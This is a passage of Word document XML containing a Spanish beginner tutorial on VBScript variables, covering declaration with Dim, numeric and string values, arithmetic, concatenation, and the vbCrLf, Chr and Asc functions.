          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>primera línea</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> la función siguiente:</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Option Explicit</w:t>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Y, luego, en el momento que se quiera crear una variable se utiliza la palabra Dim, seguido del nombre identificativo que le queramos dar, colocándolo todo, claro está, en una sola línea. Por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Option Explicit</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Dim variable1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="32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Así habremos creado una variable con el nombre identificativo variable1. Si queremos crear mas de una variable a la vez, solo hay que colocar una coma y poner luego todas las demás:</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Option Explicit</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Dim variable1, var2, varmama, nombre</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="32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Así habremos creado cuatro variables con los nombres variable1, var2, varmama y nombre. Recordad que el Option Explicit solo se coloca una vez al principio del Script, pero el Dim, se puede colocar tantas veces como se quiera para crear nuevas variables a lo largo del script:</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Option Explicit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="808080"/>
          <w:left w:val="single" w:sz="2" w:space="0" w:color="808080"/>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="808080"/>
          <w:right w:val="single" w:sz="2" w:space="0" w:color="808080"/>
        </w:pBdr>
        <w:spacing w:after="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Dim variable1, var2 'Mas funciones...</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Dim varmama, nombre</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Sabemos ya pues, como crear variables, pero ahora debemos aprender como darles valores. Para introduciros debo deciros que básicamente trabajaremos con tres tipos de valores: los valores numéricos, los valores alfanuméricos y los valores booleanos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:right="160"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lores numéricos: Son valores numéricos que van desde números negativos con decimales hasta números positivos decimales. Es decir, cualquier </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>número real</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que exista.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:right="160"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lores alfanuméricos: Podemos introducir textos, nombres, frases, párrafos, etc. en una variable. Admite </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>cualquier carácter</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (letras y números) excepto el salto de línea y la doble comilla, que se introducen de forma especial (ya se verá...).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:right="160"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lores booleanos: Son valores que indican si es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>verdadero o falso</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Podemos darle a una variable el valor verdadero o falso (en números equivaldría a un 0 o un 1).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="32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Una vez tenemos una variable creada, podemos introducirle un valor. Veamos primero como introducimos valores numéricos, que son, los mas sencillos de usar y entender. Para darle el valor numérico a una variable, colocaremos el </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>nombre de la variable seguido de un igual y el valor que le queramos dar</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (si el numero es decimal se colocará entre comillas, aunque es mejor ponerlo en forma de fracción). Por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7239"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Option Explicit Dim varPi varPi = 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="32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valor se le puede cambiar siempre que se quiera a lo largo del código, como se muestra en el siguiente ejemplo (en este ejemplo ya se </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>obvia la creación de la variable</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, añade el código correspondiente a dicha creación antes del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3431"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>varPi = 3</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3431"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>'Mas código y funciones varPi = "3,14"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>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De esta forma, todas las funciones que utilicen la variable varPi entre después de darle el valor 3 usarán ese valor, mientras que todas las funciones que vayan después de darle el valor 3,14 usaran el 3,14 y no el 3. Es decir, como he explicado antes, actúan como almacenes de datos.</w:t>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Queda explicado pues, como se asigna de forma básica valores numéricos a las variables. Pero esto no es lo único que se puede hacer con variables numéricas, porque para algo existe la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">suma (+), la resta (-), la multiplicación (*), la división (/), la potencia (^), los paréntesis </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>[( )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>], etc.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> A las variables se les puede dar como valor el resultado de una operación:</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varPi = (7*</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>2)+</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="322"/>
        <w:ind w:left="93" w:right="167"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>De esta forma, por ejemplo, varPi obtendrá el valor 15 (7 por 2 son 14, mas 1, da 15). También, se pueden introducir otras variables en la operación. Pongamos un ejemplo un poco mas complejo (obviamos la creación):</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6924"/>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7*</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>2)+</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">1 var2 </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>= 7*(2/3) var3 = var1 + var2 var4 = (1/2)* var3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="322"/>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De esta forma, var1 tendrá el valor 15, var2 el valor 4,6..., var3 el valor 19,6... y var4 el valor 9,83... Haz los cálculos y verás como es así, pero ante todo fíjate como hemos sumado las variables var1 y var2 para que den var3, colocando simplemente el nombre de la variable. Para copiar el valor de una variable a otra solo hay que hacer lo siguiente:</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6924"/>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7*</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>2)+</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>1 var2 = 7*(2/3) var2 = var1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="26"/>
        <w:ind w:left="93" w:right="164"/>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de esta forma, var2 no tendrá el valor 4,6... sino 15. Es sencillo, solo tienes que imaginar que donde pone var1 esta el contenido de var1. También puedes hacer </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>incrementos en una variable</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">,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así:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="2494" w:type="dxa"/>
        <w:tblInd w:w="21" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="26" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2494"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="1156"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2494"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38" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="89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15 var1 = var1 +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Mas código y funciones var1 = var1 + 1</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así, y con un poco de imaginación, se pueden hacer muchas operaciones...</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ntes de pasar a otro tipo de valores para las variables, comentar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habéis ejecutado el script escribiendo los ejemplos dentro, no habrá ocurrido nada de nada. Esto es porque las variables son almacenes, pero para mostrarlas al usuario, se utilizan unas funciones que se explicarán más adelante. Vayamos poco a poco...</w:t>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Otro tipo de datos que se pueden introducir son cadenas de texto. Hay que tener en cuenta que estos datos no se pueden mezclar con los numéricos, porque no son de la misma naturaleza. Al igual que con los datos numéricos, se asigna mediante el uso del símbolo igual, pero en este caso, el texto debe ir entre comillas, para que no se confundan con nombres de variables. Veamos un ejemplo (</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>la creación de la variable se obvia</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>):</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var1 = "Hola, me llamo Perico y me he comprado un periquito..."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="32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Como veis, es sencillo darle a una variable un valor de cadena de texto. Pero eso no es todo, existe un operador especial para cadenas que es la concatenación de cadenas (&amp;). Se usa de forma similar a los operadores matemáticos, pero su función es de unir cadenas de texto. Por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1486"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>nombre = "Perico" texto = "Hola, me llamo " &amp; nombre &amp; " y me he comprado un periquito..."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:ind w:left="93" w:right="163"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>En este caso, que puede resultar un poco mas complejo, vemos como tenemos una cadena ("Hola, me llamo "), luego concatenamos al contenido de la variable nombre ("Perico"), y por ultimo, concatenamos a otra cadena (" y me he comprado un periquito..."); dando como resultado lo mismo que en el primer ejemplo. Esto se suele utilizar cuando, por ejemplo, el nombre de la persona puede cambiar al ser introducido por el usuario (mas adelante se enseñará como).</w:t>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Queda claro como introducir cadenas de texto en variables, pero llegados a este punto surge un problema: </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>No podemos introducir ni comillas ni un salto de línea en las variables</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, ya que cometeríamos un error. Para esto se han creado tres funciones que solucionan este problema: el vbCrLf, el Chr y el Asc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:ind w:left="468"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="20"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El vbCrLf:</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a función no tiene argumentos, y simplemente devuelve el valor de un </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>salto de línea</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, permitiéndonos almacenarlo en una variable. Por ejemplo:</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var1 = "Hola, me llamo Perico." &amp; vbCrLf &amp; "Me he comprado un periquito."</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dará como resultado lo siguiente:</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Hola me llamo Perico.</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Me he comprado un periquit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de esa forma, siempre que queramos, podremos introducir un salto de línea en las variables.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:ind w:left="468"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="20"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El Chr:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="322"/>
        <w:ind w:left="93" w:right="154"/>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Esta función tiene un argumento, es decir, cuando la usemos tendremos que introducirle un dato para que nos devuelva otro. En este caso, supongo que sabréis que es el código </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ascii</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Y si no, buscad por Internet información relacionada con esto. Pero a lo que vamos, esta función se le introduce el código numérico correspondiente a un carácter ascii para que devuelva el carácter correspondiente. Con esto, y sabiendo que las comillas se corresponden con el 34, pongamos un ejemplo:</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1 = "Hola, me llamo " &amp; </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34) &amp; "Perico" &amp; Chr(34) &amp; "."&lt;7a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:ind w:left="93" w:right="451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lo siguiente: </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Hola me llamo "Perico".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>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Y de esa forma, siempre que queramos, podremos introducir comillas en las variables. Si se os ocurre cambiar el numero que hay dentro del Chr, veréis que los caracteres que devuelve son diferentes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:ind w:left="468"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="20"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El Asc:</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Esta función es simplemente la inversa del Chr. En este caso debemos introducir el carácter entre comillas y nos devolverá el código Ascii de ese carácter. Por ejemplo:</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var1 = Asc("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el numero 97,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se coloca en la función Chr, dará "a". Esta función se suele utilizar para la encriptación de datos.</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Para concluir con esta explicación, intentad sabed que valor tendrá ResX en el siguiente ejemplo: (</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>clic aquí para ver solución</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8654" w:type="dxa"/>
        <w:tblInd w:w="21" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="26" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="39" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8654"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="1156"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8654"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38" w:lineRule="auto"/>
